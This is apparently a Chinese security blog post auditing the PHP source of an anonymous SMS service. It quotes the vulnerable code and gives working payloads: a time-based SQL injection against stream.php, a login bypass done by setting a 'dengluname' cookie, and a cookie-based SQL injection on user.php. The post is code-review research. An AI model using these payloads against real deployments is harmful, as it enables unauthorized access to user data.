<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">




<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

  <meta name="author" content="Hehanzzz">


  <meta name="subtitle" content="“冬将尽，春可期”">


  <meta name="description" content="Hehanzzz">



<title>“小月云匿名短信系统源码V2.0”审计 | Hehanzzz’s Blog</title>



<link rel="icon" href="/favicon.ico">



<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/nprogress/nprogress.css">



<script src="/lib/jquery.min.js"></script>


<script src="/lib/iconify-icon.min.js"></script>


<script src="https://cdn.tailwindcss.com?plugins=typography"></script>
<script>
  tailwind.config = {
    darkMode: "class",
  };
</script>


<script src="/lib/nprogress/nprogress.js"></script>

<script>
  $(document).ready(() => {
    NProgress.configure({
      showSpinner: false,
    });
    NProgress.start();
    $("#nprogress .bar").css({
      background: "#de7441",
    });
    $("#nprogress .peg").css({
      "box-shadow": "0 0 2px #de7441, 0 0 4px #de7441",
    });
    $("#nprogress .spinner-icon").css({
      "border-top-color": "#de7441",
      "border-left-color": "#de7441",
    });
    setTimeout(function () {
      NProgress.done();
      $(".fade").removeClass("out");
    }, 800);
  });
</script>

<script>
  (function () {
    const prefersDark =
      window.matchMedia &&
      window.matchMedia("(prefers-color-scheme: dark)").matches;
    const setting = localStorage.getItem("hexo-color-scheme") || "auto";
    if (setting === "dark" || (prefersDark && setting !== "light"))
      document.documentElement.classList.toggle("dark", true);
    let isDark = document.documentElement.classList.contains("dark");
  })();

  $(document).ready(function () {
    // init icon
    const prefersDark =
      window.matchMedia &&
      window.matchMedia("(prefers-color-scheme: dark)").matches;
    const isDark = document.documentElement.classList.contains("dark");
    $("#theme-icon").attr("icon", isDark ? "ri:moon-line" : "ri:sun-line");

    function toggleGiscusTheme() {
      const isDark = document.documentElement.classList.contains("dark");
      const giscusFrame = document.querySelector("iframe.giscus-frame");
      if (giscusFrame) {
        giscusFrame.contentWindow.postMessage(
          {
            giscus: {
              setConfig: {
                theme: isDark ? "dark" : "light",
              },
            },
          },
          "https://giscus.app"
        );
      }
    }


    // toggle dark mode
    function toggleDark() {
      let isDark = document.documentElement.classList.contains("dark");
      const setting = localStorage.getItem("hexo-color-scheme") || "auto";
      isDark = !isDark;
      document.documentElement.classList.toggle("dark", isDark);
      $("#theme-icon").attr("icon", isDark ? "ri:moon-line" : "ri:sun-line");
      if (prefersDark === isDark) {
        localStorage.setItem("hexo-color-scheme", "auto");
      } else {
        localStorage.setItem("hexo-color-scheme", isDark ? "dark" : "light");
      }
      toggleGiscusTheme();
    }
    $("#toggle-dark").click(toggleDark);

    // listen dark mode change
    window
      .matchMedia("(prefers-color-scheme: dark)")
      .addEventListener("change", (e) => {
        const setting = localStorage.getItem("hexo-color-scheme") || "auto";
        if (setting === "auto") {
          document.documentElement.classList.toggle("dark", e.matches);
          $("#theme-icon").attr(
            "icon",
            e.matches ? "ri:moon-line" : "ri:sun-line"
          );
          toggleGiscusTheme();
        }
      });
  });
</script>




<meta name="generator" content="Hexo 7.0.0"></head>
<body class="font-sans bg-white dark:bg-zinc-900 text-gray-700 dark:text-gray-200 relative">
  <header class="fixed w-full px-5 py-1 z-10 backdrop-blur-xl backdrop-saturate-150 border-b border-black/5">
  <div class="max-auto">
    <nav class="flex items-center text-base">
      <a href="/" class="group">
        <h2 class="font-medium tracking-tighterp text-l p-2">
          <img class="w-5 mr-2 inline-block transition-transform group-hover:rotate-[30deg]" id="logo" src="/images/logo.svg" alt="Hehanzzz’s Blog" />
          Hehanzzz’s Blog
        </h2>
      </a>
      <div id="header-title" class="opacity-0 md:ml-2 md:mt-[0.1rem] text-xs font-medium whitespace-nowrap overflow-hidden overflow-ellipsis">
        “小月云匿名短信系统源码V2.0”审计
      </div>
      <div class="flex-1"></div>
      <div class="flex items-center gap-3">
        
          <a class="hidden sm:flex" href="/archives">Posts</a>
        
        
          
            <a class="w-5 h-5 hidden sm:flex" title="Github" target="_blank" rel="noopener" href="https://github.com/hehanzzz">
              <iconify-icon width="20" icon="ri:github-line"></iconify-icon>
            </a>
          
            <a class="w-5 h-5 hidden sm:flex" title="Twitter" target="_blank" rel="noopener" href="https://x.com/hehanzzz">
              <iconify-icon width="20" icon="ri:twitter-line"></iconify-icon>
            </a>
          
        
        <a class="w-5 h-5 hidden sm:flex" title="友情链接" href="2023/12/31/About-me-关于我/">
          <iconify-icon width="20" icon="ri:rss-line"></iconify-icon>
        </a>
        <a class="w-5 h-5" title="toggle theme" id="toggle-dark">
          <iconify-icon width="20" icon="" id="theme-icon"></iconify-icon>
        </a>
      </div>
      <div class="flex items-center justify-center gap-3 ml-3 sm:hidden">
        <span class="w-5 h-5" aria-hidden="true" role="img" id="open-menu">
          <iconify-icon width="20" icon="carbon:menu" ></iconify-icon>
        </span>
        <span class="w-5 h-5 hidden" aria-hidden="true" role="img" id="close-menu">
          <iconify-icon  width="20" icon="carbon:close" ></iconify-icon>
        </span>
      </div>
    </nav>
  </div>
</header>
<div id="menu-panel" class="h-0 overflow-hidden sm:hidden fixed left-0 right-0 top-12 bottom-0 z-10">
  <div id="menu-content" class="relative z-20 bg-white/80 px-6 sm:px-8 py-2 backdrop-blur-xl -translate-y-full transition-transform duration-300">
    <ul class="nav flex flex-col sm:flex-row text-sm font-medium">
      
        <li class="nav-portfolio sm:mx-2 border-b sm:border-0 border-black/5 last:border-0 hover:text-main">
          <a href="/archives" class="flex h-12 sm:h-auto items-center">Posts</a>
        </li>
      
    </ul>
  </div>
  <div class="mask bg-black/20 absolute inset-0"></div>
</div>

  <main class="pt-14">
    <!-- css -->

<link rel="stylesheet" href="/lib/fancybox/fancybox.min.css">


<link rel="stylesheet" href="/lib/tocbot/tocbot.min.css">

<!-- toc -->

  <!-- tocbot -->
<nav class="post-toc toc text-sm w-48 relative top-32 right-0 opacity-70 hidden lg:block" style="position: fixed !important;"></nav>


<section class="px-6 max-w-prose mx-auto md:px-0">
  <!-- header -->
  <header class="overflow-hidden pt-6 pb-6 md:pt-12">
    <div class="pt-4 md:pt-6">
      <h1 id="article-title" class="text-[2rem] font-bold leading-snug mb-4 md:mb-6 md:text-[2.6rem]">
        “小月云匿名短信系统源码V2.0”审计
      </h1>
      <div>
        <section class="flex items-center gap-3 text-sm">
          <span class="flex items-center gap-1">
            <iconify-icon width="18" icon="carbon-calendar" ></iconify-icon>
            <time>2024-05-10</time>
          </span>
          <span class="text-gray-400">·</span>
          <span class="flex items-center gap-1">
            <iconify-icon width="18" icon="ic:round-access-alarm" ></iconify-icon>
            <span>3 min</span>
          </span>
          <span class="text-gray-400">·</span>
          <span class="flex items-center gap-1">
            <iconify-icon width="18" icon="icon-park-outline:font-search" ></iconify-icon>
            <span>743 words</span>
          </span>
          
        </section>
      </div>
    </div>
  </header>
  <!-- content -->
  <article class="post-content prose m-auto slide-enter-content dark:prose-invert">
    <p>记录某次PHP审计</p>
<span id="more"></span>

<h1 id="0x01-起因"><a href="#0x01-起因" class="headerlink" title="0x01 起因"></a>0x01 起因</h1><p>无聊找网上源码审计，看到这个匿名信的UI干净整洁好看，想着试试审计看看</p>
<p><img src="http://oss.hehanzzz.icu/img/202405101413874.png"></p>
<p>网上实在找不到资产，只能自己搭建一个了</p>
<h1 id="0x02-源码搭建"><a href="#0x02-源码搭建" class="headerlink" title="0x02 源码搭建"></a>0x02 源码搭建</h1><ol>
<li><p>首先导入数据库</p>
</li>
<li><p>然后修改数据库\lib\config.php</p>
</li>
<li><p>配置Nginx伪静态:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">rewrite ^/stream$ /stream.php;</span><br><span class="line">rewrite ^/status /status.php;</span><br></pre></td></tr></table></figure>
</li>
<li><p>后台 &#x2F;admin admin&#x2F;123456</p>
</li>
<li><p>短信计划任务监控地址</p>
<p>http:&#x2F;&#x2F;你的域名&#x2F;other&#x2F;jk.php</p>
<p>直接放到宝塔设置半个小时执行一次就可以了</p>
</li>
</ol>
<h1 id="0x03-SQL注入-1"><a href="#0x03-SQL注入-1" class="headerlink" title="0x03 SQL注入 * 1"></a>0x03 SQL注入 * 1</h1><p>不是mvc框架的，所以直接访问就好了</p>
<p>在 stream.php 下存在多处Sql注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: text/html;charset=utf-8&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Allow-Origin:*&#x27;</span>); </span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods:POST,GET,OPTIONS,DELETE&#x27;</span>);</span><br><span class="line"><span class="keyword">require</span>(<span class="string">&#x27;./lib/init.php&#x27;</span>);</span><br><span class="line"><span class="variable">$hfnr</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;content&#x27;</span>];</span><br><span class="line"><span class="variable">$appid</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;apiid&#x27;</span>];</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;select huixin from nmdx_list where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$hfxinxi</span> = <span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">getOne</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;select huixinshijian from nmdx_list where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$huixinshijianss</span> = <span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">getOne</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$hfxinxi</span> == <span class="string">&#x27;&#x27;</span>)&#123;</span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">&quot;update nmdx_list set huixin=&#x27;<span class="subst">$hfnr</span>&#x27; where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line">    <span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line">    <span class="variable">$huixinshijian</span> = <span class="title function_ invoke__">date</span>(<span class="string">&quot;Y-m-d H:i:s&quot;</span>);</span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">&quot;update nmdx_list set huixinshijian=&#x27;<span class="subst">$huixinshijian</span>&#x27; where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line">    <span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$hfxinxi</span> = <span class="variable">$hfxinxi</span> . <span class="string">&#x27;我是分割&#x27;</span> . <span class="variable">$hfnr</span>;</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;update nmdx_list set huixin=&#x27;<span class="subst">$hfxinxi</span>&#x27; where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$huixinshijianss</span> = <span class="variable">$huixinshijianss</span> . <span class="string">&#x27;我是分割&#x27;</span> . <span class="title function_ invoke__">date</span>(<span class="string">&quot;Y-m-d H:i:s&quot;</span>);</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;update nmdx_list set huixinshijian=&#x27;<span class="subst">$huixinshijianss</span>&#x27; where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="这里只举例一个payload"><a href="#这里只举例一个payload" class="headerlink" title="这里只举例一个payload"></a>这里只举例一个payload</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">POST /stream.php HTTP/<span class="number">1.1</span></span><br><span class="line"></span><br><span class="line"> apiid=<span class="number">1</span>  <span class="string">&#x27; AND (SELECT 6230 FROM (SELECT(SLEEP(5)))rxWg) AND &#x27;</span>fanJ<span class="string">&#x27;=&#x27;</span>fanJ</span><br></pre></td></tr></table></figure>

<p><img src="http://oss.hehanzzz.icu/img/202405101414044.png"></p>
<h1 id="0x04-SQL注入-2"><a href="#0x04-SQL注入-2" class="headerlink" title="0x04 SQL注入 * 2"></a>0x04 SQL注入 * 2</h1><p>在 status.php 下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: text/html;charset=utf-8&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Allow-Origin:*&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods:POST,GET,OPTIONS,DELETE&#x27;</span>);</span><br><span class="line"><span class="keyword">require</span>(<span class="string">&#x27;./lib/init.php&#x27;</span>);</span><br><span class="line"><span class="variable">$cwnr</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;remarks&#x27;</span>];</span><br><span class="line"><span class="variable">$appid</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;apiid&#x27;</span>];</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;update nmdx_list set shifoufasong=&#x27;2&#x27; where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$cwnr</span> == <span class="string">&#x27;黑名单&#x27;</span>)&#123;</span><br><span class="line">    <span class="variable">$cwnr</span> = <span class="string">&#x27;匿名短信已经被对方拉入黑名单&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;update nmdx_list set sbyy=&#x27;<span class="subst">$cwnr</span>&#x27; where suijistr=&#x27;<span class="subst">$appid</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>很明显这里的 $appid 依旧存在注入</p>
<p>payload就不举例了</p>
<h1 id="0x05-用户登录绕过"><a href="#0x05-用户登录绕过" class="headerlink" title="0x05 用户登录绕过"></a>0x05 用户登录绕过</h1><p>例如访问 faxin.php 的时候，如果没登陆会跳转到 re.php 让你登录</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$sfyjdl</span> = <span class="variable">$_COOKIE</span>[<span class="string">&#x27;dengluname&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$sfyjdl</span>))&#123;</span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: re.php&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>写这个的人也是nt，用cookie去判断</p>
<p>直接cookieBypass</p>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cookie: dengluname=<span class="number">1</span>;</span><br></pre></td></tr></table></figure>

<h1 id="0x06-Cookie注入"><a href="#0x06-Cookie注入" class="headerlink" title="0x06 Cookie注入"></a>0x06 Cookie注入</h1><p>在 user.php 下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$dqyhip</span> = <span class="title function_ invoke__">getIp</span>();</span><br><span class="line"><span class="variable">$sfyjdl</span> = <span class="variable">$_COOKIE</span>[<span class="string">&#x27;dengluname&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$sfyjdl</span>))&#123;</span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: re.php&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$shoujihao</span> = <span class="variable">$_COOKIE</span>[<span class="string">&#x27;dengluname&#x27;</span>];</span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;select * from nmdx_user where shoujihao=&#x27;<span class="subst">$shoujihao</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$syxx</span> = <span class="variable">$mysql</span>-&gt;<span class="title function_ invoke__">getRow</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$sydxed</span> = <span class="variable">$syxx</span>[<span class="string">&#x27;sydxedu&#x27;</span>];</span><br><span class="line"><span class="variable">$yydxed</span> = <span class="variable">$syxx</span>[<span class="string">&#x27;yfdx&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>很明显，得结合前面的用户登录绕过，然后进行sql注入</p>
<h4 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET /user.php HTTP/<span class="number">1.1</span></span><br><span class="line">cookie: dengluname=<span class="number">1</span>; dengluname=*</span><br></pre></td></tr></table></figure>



<p>还有更多洞，难得挖了，因为其他后台等源码进行了简单的加密，懒得解密了，有空以后再看看</p>

  </article>
  <!-- tag -->
  <div class="mt-12 pt-6 border-t border-gray-200">
    
      
        <span class="bg-gray-100 dark:bg-gray-700 px-2 py-1 m-1 text-sm rounded-md transition-colors hover:bg-gray-200">
          <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a>
        </span>
      
        <span class="bg-gray-100 dark:bg-gray-700 px-2 py-1 m-1 text-sm rounded-md transition-colors hover:bg-gray-200">
          <a href="/tags/PHP/">PHP</a>
        </span>
      
    
  </div>
  <!-- prev and next -->
  <div class="flex justify-between mt-12 pt-6 border-t border-gray-200">
    <div>
      
        <a href="/2024/05/13/%E4%BB%8E%E7%9C%81%E8%B5%9B%E6%9F%90%E9%A2%98%E5%88%B03KCTF%E6%8E%A2%E8%AE%A8%E2%80%9CTCPDF%E2%80%9D/" class="text-sm text-gray-400 hover:text-gray-500 flex justify-center">
          <iconify-icon width="20" icon="ri:arrow-left-s-line" data-inline="false"></iconify-icon>
          从省赛某题到3KCTF探讨“TCPDF”
        </a>
      
    </div>
    <div>
      
        <a href="/2024/05/09/%E2%80%9C2024%E9%BE%99%E5%B9%B4%E6%96%B0%E7%89%88%E6%B5%8B%E7%AE%97%E6%BA%90%E7%A0%81%E2%80%9D%E5%AE%A1%E8%AE%A1/" class="text-sm text-gray-400 hover:text-gray-500 flex justify-center">
          “2024龙年新版测算源码”审计
          <iconify-icon width="20" icon="ri:arrow-right-s-line" data-inline="false"></iconify-icon>
        </a>
      
    </div>
  </div>
  <!-- comment -->
  <div class="article-comments mt-12">
    
<script
  src="https://giscus.app/client.js"
  data-repo="Hehanzzz/hehanzzz.github.io"
  data-repo-id="R_kgDOKls9Wg"
  data-category="Announcements"
  data-category-id="DIC_kwDOKls9Ws4Cb8Mv"
  data-mapping="pathname"
  data-strict="0"
  data-reactions-enabled="1"
  data-emit-metadata="0"
  data-input-position="bottom"
  data-theme="preferred_color_scheme"
  data-lang="zh-CN"
  crossorigin="anonymous"
  async
></script>
<script>
  window.onload = function () {
    console.log("giscus loaded");
    const isDark = document.documentElement.classList.contains("dark");
    const giscusFrame = document.querySelector("iframe.giscus-frame");
    giscusFrame.contentWindow.postMessage(
      {
        giscus: {
          setConfig: {
            theme: isDark ? "dark" : "light",
          },
        },
      },
      "https://giscus.app"
    );
  };
</script>


  </div>
</section>
<!-- js inspect -->

<script src="/lib/clipboard.min.js"></script>


<script async src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
  });
</script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
<script>
  $(document).ready(() => {
    const maraidConfig = {
      theme: "default",
      logLevel: 3,
      flowchart: { curve: "linear" },
      gantt: { axisFormat: "%m/%d/%Y" },
      sequence: { actorMargin: 50 },
    };
    mermaid.initialize(maraidConfig);
  });
</script>



<script src="/lib/fancybox/fancybox.umd.min.js"></script>

<script>
  $(document).ready(() => {
    $('.post-content').each(function(i){
      $(this).find('img').each(function(){
        if ($(this).parent().hasClass('fancybox') || $(this).parent().is('a')) return;
        var alt = this.alt;
        if (alt) $(this).after('<span class="fancybox-alt">' + alt + '</span>');
        $(this).wrap('<a class="fancybox-img" href="' + this.src + '" data-fancybox=\"gallery\" data-caption="' + alt + '"></a>')
      });
      $(this).find('.fancybox').each(function(){
        $(this).attr('rel', 'article' + i);
      });
    });

    Fancybox.bind('[data-fancybox="gallery"]', {
        // options
    })
  })
</script>

<!-- tocbot begin -->

<script src="/lib/tocbot/tocbot.min.js"></script>

<script>
  $(document).ready(() => {
      tocbot.init({
        // Where to render the table of contents.
        tocSelector: '.post-toc',
        // Where to grab the headings to build the table of contents.
        contentSelector: '.post-content',
        // Which headings to grab inside of the contentSelector element.
        headingSelector: 'h1, h2, h3',
        // For headings inside relative or absolute positioned containers within content.
        hasInnerContainers: true,
    });
  })
</script>
<!-- tocbot end -->


  </main>
  <footer class="flex flex-col h-40 items-center justify-center text-gray-400 text-sm">
  <!-- busuanzi -->
  
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<!-- Busuanzi Analytics -->
<div class="flex items-center gap-2">
  <span>Visitors</span>
  <span id="busuanzi_value_site_uv"></span>
  <span>Page Views</span>
  <span id="busuanzi_value_site_pv"></span>
</div>
<!-- End Busuanzi Analytics -->


  <!-- copyright -->
  <div class="flex items-center gap-2">
    <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/" style="color: inherit;">CC BY-NC-SA 4.0</a>
    <span>© 2023</span>
    <iconify-icon width="18" icon="emojione-monotone:maple-leaf" ></iconify-icon>
    <a href="https://github.com/hehanzzz" target="_blank" rel="noopener noreferrer">Hehanzzz</a>
  </div>
  <!-- powered by -->
  <div class="flex items-center gap-2">
    <span>Powered by</span>
    <a href="https://hexo.io/" target="_blank" rel="noopener noreferrer">Hexo</a>
    <span>&</span>
    <a href="https://github.com/hehanzzz" target="_blank" rel="noopener noreferrer">Maple</a>
  </div>

</footer>

  <div class="back-to-top box-border fixed right-6 z-1024 -bottom-20 rounded py-1 px-1 bg-slate-900 opacity-60 text-white cursor-pointer text-center dark:bg-slate-600">
    <span class="flex justify-center items-center text-sm">
      <iconify-icon width="18" icon="ion:arrow-up-c" id="go-top"></iconify-icon>
      <span id="scrollpercent"><span>0</span> %</span>
    </span>
  </div>
  
<script src="/js/main.js"></script>


  <script>
    $(document).ready(function () {
      const mapleCount = "10";
      const speed = "0.5";
      const mapleEl = document.getElementById("maple");
      const maples = Array.from({ length: mapleCount }).map(() => {
        const maple = document.createElement("div");
        const scale = Math.random() * 0.5 + 0.5;
        const offset = Math.random() * 2 - 1;
        const x = Math.random() * mapleEl.clientWidth;
        const y = -Math.random() * mapleEl.clientHeight;
        const duration = 10 / speed;
        const delay = -duration;
        maple.className = "maple";
        maple.style.width = `${24 * scale}px`;
        maple.style.height = `${24 * scale}px`;
        maple.style.left = `${x}px`;
        maple.style.top = `${y}px`;
        maple.style.setProperty("--maple-fall-offset", offset);
        maple.style.setProperty("--maple-fall-height", `${Math.abs(y) + mapleEl.clientHeight}px`);
        maple.style.animation = `fall ${duration}s linear infinite`;
        maple.style.animationDelay = `${delay}s`;
        mapleEl.appendChild(maple)
        return maple
      })
    });
  </script>
  


  <div class="fixed top-0 bottom-0 left-0 right-0 pointer-events-none print:hidden" id="maple"></div>
</body>

</html>
